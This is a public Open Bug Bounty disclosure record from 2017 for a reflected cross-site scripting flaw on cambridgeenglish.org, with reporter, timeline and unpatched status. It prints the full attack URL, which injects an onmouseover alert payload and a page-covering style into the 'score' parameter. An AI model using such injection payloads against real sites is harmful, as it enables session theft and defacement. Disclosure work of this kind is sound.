cambridgeenglish.org XSS vulnerability

2017-07-06T00:28:00
ID OBB:260570
Type openbugbounty
Reporter Tomy2e
Modified 2017-07-13T01:14:00

Description

Vulnerable URL:
http://www.cambridgeenglish.org/fr/test-your-english/adult-learners/results/?score=%27%20onmouseover=%27alert(%22openbugbounty%22)%27%20style=%27z-index:10;display:block;position:absolute;top:0;left:0;width:100%;height:100%;%27%3eclick%20here&answers;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 02.08.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 11294
VIP website status:| Yes
Check cambridgeenglish.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 July, 2017 00:28 GMT
Generic security notifications sent to website owner| 6 July, 2017 00:31 GMT
Notification sent to subscribers (without technical details)| 6 July, 2017 02:17 GMT
Vulnerability details disclosed by researcher| 13 July, 2017 01:14 GMT